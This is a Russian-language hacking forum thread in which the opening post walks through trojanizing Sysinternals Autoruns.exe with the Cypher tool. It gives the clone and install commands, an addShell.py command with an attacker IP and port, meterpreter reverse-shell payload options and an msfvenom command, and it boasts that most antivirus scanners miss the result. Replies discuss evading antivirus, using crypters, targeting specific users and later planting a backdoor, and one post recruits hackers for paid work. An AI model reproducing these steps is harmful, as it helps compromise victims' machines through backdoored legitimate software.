Статьи Продолжаем гнуть Антивирус часть 3

Discussion in 'Статьи' started by Veil, 4 Oct 2017.

  1. Veil

    Veil Level 8

    Joined:
    21 May 2015
    Messages:
    1,926
    Likes Received:
    2,846
    Reputations:
    56
    В третьей части не удалось нагнуть антивирь, но мы не будем унывать, а будем искать другой метод нагиба.
    Вот очередной метод.
    Прикручиваем наш зловред к .ехе файлу авторунса Марка Руссиновича .
    Результат одного из он лайн антивиря : Scanner results:10%Сканер(4/39) обнаружил зловред!
    Другого
    [​IMG]

    [​IMG]

    Наши добрые друзья КасперМский, Аваст, доктор Вэб, Аваст и даже Авира лососнули тунца.

    [​IMG]

    Вы спросите, что это за чудо?
    А чудо называется Cypher - простой инструмент для автоматического добавления shellcode в файлы PE. Файлы PE представляют собой переносимые исполняемые файлы.
    Cypher позволяет просто добавлять shellcode к портативным исполняемым файлам.
    А теперь я покажу как выполняется взлом Венды с помощью шеллкода Cypher

    Качаем
    > git clone https://github.com/xan7r/cypher
    > cd cypher
    > pip2 install pefile capstone

    Берем исполнительный файл к которому мы "прикрутим" шелл , у нас он Autoruns.exe и кладем его в папку cypher. Это важно. Убеждаемся, что находимся в том же каталоге,где мы клонировали cypher.
    [​IMG]
    Вводим команду.
    > cd cypher
    > python addShell.py -f /root/cypher/Autoruns.exe -t 0 -d 10 -H 192.168.1.5 -P 80 -p 1
    Теперь я покажу какие параметры мы указали.

    -f: опция 'f' означает файл. Это нужно указать переносимый исполняемый файл, в который мы хотим создать наш бэкдор. Помните, что некоторые исполняемые файлы упакованы и не позволяют писать код оболочки. Протестируйте и используйте соответственно. Здесь я использую Autoruns.exe, который находится на моем Рабочем столе.

    -t: целевая ОС, для которой вы хотите создать этот бэкдор. К ним относятся четыре варианта: 0,1,2,3. Это для Windows 7 32bit, Windows 7 64 бит, Windows 8.1 64bit и Windows 10 64bit соответственно. Здесь я указал его как 0, так как тестирую его на 32-разрядной ОС Windows 7.

    -d: смещение. Это не что иное, как расстояние между точкой, в которой мы пытаемся ввести наш шеллкод, к точке, где мы точно размещаем наш шеллкод. Даже если вы не понимаете этого предложения выше, позвольте мне рассказать вам, почему это важно. Успех ввода нашего шеллкода в исполняемый файл заключается в том, что исполняемый файл должен работать нормально даже после того, как мы введем наш бэкдор. Exe не должен терпеть крах. По умолчанию это значение равно четырем. Но если ваш exe сбой, установите его на большее значение (я установил его на 10), как я сделал выше.

    -H: IP-адрес атакующего. В нашем случае IP-адрес Kali Linux.

    -P: порт, на который мы хотим вернуть нашу оболочку.

    -p: Обратите внимание на строчные буквы. Это означает полезную нагрузку, которую мы хотим установить. '1' означает Windows / meterpreter / reverse_http. Другие варианты:

    0 - windows / shell / reverse_tcp,
    2- Windows / meterpreter / reverse_http + PrependMigrate,
    3- Windows / meterpreter / reverse_https,
    4- Windows / meterpreter / reverse_https + PrependMigrate

    Использование: использование python addShell.py [ОПЦИИ]
    Пример: python addShell.py -f ./Autoruns.exe -H 192.168.1.10 -P 443 -p 3

    Опции:
    -h, --help показать это справочное сообщение и выйти
    -f FILE Укажите входной файл PE для бэкдора
    -o OUTPUT Укажите местоположение вывода, чтобы сохранить скрытый файл.
    По умолчанию = inputFile_evil.exe
    -H HOSTIP Укажите IP-адрес прослушивающего узла для обратного подключения, например: 192.168.1.10
    -P PORT Укажите номер порта прослушивания, например: 4321
    -s SHELLCODE Укажите пользовательский шеллкод для использования, ПРИМЕЧАНИЕ. Эта функция в бэкдор-режиме добавляет 310 байтов к размеру шекидного кода
    ПРИМЕЧАНИЕ: должно быть в шестнадцатеричном формате feedbeef, рекомендуется использовать следующую команду для правильного форматирования shellcode:
    msfvenom -p windows / meterpreter / reverse_https LHOST = 1.2.3.4 LPORT = 443 -f raw | xxd -p | tr -d ""
    -p PAYLOAD Укажите полезную нагрузку. По умолчанию shell_reverse_tcp. Допустимые значения:
    0 - windows / shell_reverse_tcp
    1 - windows / meterpreter / reverse_http
    2 - windows / meterpreter / reverse_http + PrependMigrate
    3 - windows / meterpreter / reverse_https
    4 - windows / meterpreter / reverse_https + PrependMigrate
    -m MODE Укажите программный режим. Программа была разработана для исполняемых файлов backdoor, но если вам действительно нужно, вы можете отключить обычное выполнение программы в режиме FRONTDOOR.
    Допустимые значения: (по умолчанию 0):
    0 - ЗАДНЯЯ ЧАСТЬ
    1 - ПЕРЕДНИЙ
    -t TARGETOS Укажите целевую операционную систему (используется для сохранения ESP). По умолчанию Win7_64bit. Допустимые значения:
    0 - Win7_32bit
    1 - Win7_64bit
    2 - Win8.1_64bit
    3 - Win10_64bit
    -d OFFSET Укажите расстояние смещения между шелковым кодом и началом пещеры. Рекомендовать увеличить это значение, если PE сбой после оболочки.
    По умолчанию: 4
    -j NUM_JUNK Укажите количество «нежелательных» инструкций для использования в эвристической процедуре байпаса.
    По умолчанию 30
    -J NUM_JUNK_ITER Укажите количество раз, чтобы перебрать все инструкции «Junk», используемые в эвристической процедуре байпаса.
    По умолчанию 20 000 000
    -e NUM_ENCODE Укажите количество случайных операций, используемых для кодирования шеллкода.
    По умолчанию: 10, Макс: 40

    Готовый зловред, лежит в той же папке.
    [​IMG]

    Запускаем на атакуемом хосте и видим, что авторунс спокойно запустился без всяких проблем.
    [​IMG]

    А на своей машине мы получаем сессию Кобальт Страйка.

    [​IMG]
    Вуаля!
    Особая благодарность в написании статьи K800, Kevin Shindel , \/IRUS, BabaDook.
    PS. Забыл написать файл Autoruns.exe 717,0 кБ (716 968 байт)
    а наш зловред Autoruns_evil.exe 700,9 кБ (700 928 байт)

    [​IMG]

    Куда пропали почти 16 кБ ?
     
    #1 Veil, 4 Oct 2017
    Last edited: 5 Oct 2017
    madik, Diophantus_, CKAP and 8 others like this.
  2. BabaDook

    BabaDook Level 8

    Joined:
    9 May 2015
    Messages:
    794
    Likes Received:
    913
    Reputations:
    58
  3. DooD

    DooD Moderator

    Joined:
    30 Sep 2010
    Messages:
    1,176
    Likes Received:
    393
    Reputations:
    288
    обойди смарт скрин или встроенный виндовый ав)уже года 2 не пользую антивирь...
     
    _________________________
  4. Veil

    Veil Level 8

    Joined:
    21 May 2015
    Messages:
    1,926
    Likes Received:
    2,846
    Reputations:
    56
    У меня нет вин10, а ставить лень. Так что проверить не могу.
    А если этот, то сам видишь.
    [​IMG]

    И вообще как понять такое?
    [​IMG]
    и это
    [​IMG]
     
    #4 Veil, 5 Oct 2017
    Last edited: 5 Oct 2017
  5. Mumu

    Mumu Member

    Joined:
    28 Mar 2017
    Messages:
    31
    Likes Received:
    19
    Reputations:
    0
    На первом старые базы (судя по дате в 4-ом столбце). А вообще движки на разных сервисах по разному настраиваются и результаты получаются разные.
     
  6. DooD

    DooD Moderator

    Joined:
    30 Sep 2010
    Messages:
    1,176
    Likes Received:
    393
    Reputations:
    288
    эвристика дружище
     
    _________________________
    uzeerpc likes this.
  7. Veil

    Veil Level 8

    Joined:
    21 May 2015
    Messages:
    1,926
    Likes Received:
    2,846
    Reputations:
    56
    Это даже Ежу( то бишь даже мне) ясно, но есть одно но. Сработает ли?
     
  8. DooD

    DooD Moderator

    Joined:
    30 Sep 2010
    Messages:
    1,176
    Likes Received:
    393
    Reputations:
    288
    смотря как настроить
     
    _________________________
  9. Veil

    Veil Level 8

    Joined:
    21 May 2015
    Messages:
    1,926
    Likes Received:
    2,846
    Reputations:
    56
    Скажем так настройка по умолчанию. Но есть одно но,...
    Какое?
     
  10. Veil

    Veil Level 8

    Joined:
    21 May 2015
    Messages:
    1,926
    Likes Received:
    2,846
    Reputations:
    56
    Я по поводу эвристики и сигнатуры. какая идет настройка по умолчанию АВ?;)
     
  11. DooD

    DooD Moderator

    Joined:
    30 Sep 2010
    Messages:
    1,176
    Likes Received:
    393
    Reputations:
    288
    дам тебе намек попроще.все эти изъебы хорошо , но в связке с криптом.а учитывая характер тобою написанного делается не на залив ,а с целью напасть на конкретного юзера.соответственно париться вообще не надо;)
     
    _________________________
    Veil likes this.
  12. Veil

    Veil Level 8

    Joined:
    21 May 2015
    Messages:
    1,926
    Likes Received:
    2,846
    Reputations:
    56
    Что значит на залив?;) Если я к юзеру попал, то после сессии, залью и бакдор.)))
    А по поводу " поссоны качайте тут" это не про меня. Прошли те времена, сейчас только цель и все остальное лесом.
     
  13. DooD

    DooD Moderator

    Joined:
    30 Sep 2010
    Messages:
    1,176
    Likes Received:
    393
    Reputations:
    288
    На залив это значит на залив)типа связка понял)
     
    _________________________
  14. Veil

    Veil Level 8

    Joined:
    21 May 2015
    Messages:
    1,926
    Likes Received:
    2,846
    Reputations:
    56
    Это ясно даже и Ежу.;)
     
  15. robingut0001

    robingut0001 New Member

    Joined:
    7 Oct 2017
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    ищу програмистов хакеров есть работа очень болщийи денги писать личку
     
  16. Veil

    Veil Level 8

    Joined:
    21 May 2015
    Messages:
    1,926
    Likes Received:
    2,846
    Reputations:
    56
    Здесь нет хакеров, тут все только учатся.
     
    CKAP, ms13 and K800 like this.
  17. K800

    K800 Nobody's Fool

    Joined:
    25 Dec 2010
    Messages:
    1,910
    Likes Received:
    2,072
    Reputations:
    346
     
    madik, CKAP, Triton_Mgn and 2 others like this.
  18. artkar

    artkar Active Member

    Joined:
    14 Nov 2016
    Messages:
    332
    Likes Received:
    299
    Reputations:
    2
    Здесь нет хакеров и тут никто уже ничему не учиться.
     
  19. Alangile

    Alangile New Member

    Joined:
    28 Sep 2017
    Messages:
    108
    Likes Received:
    2
    Reputations:
    0
    кто то уже нагнул авиру?
     
  20. Veil

    Veil Level 8

    Joined:
    21 May 2015
    Messages:
    1,926
    Likes Received:
    2,846
    Reputations:
    56
    Новый Veil, который недавно вышел, гнет пока все антивири.
     
Loading...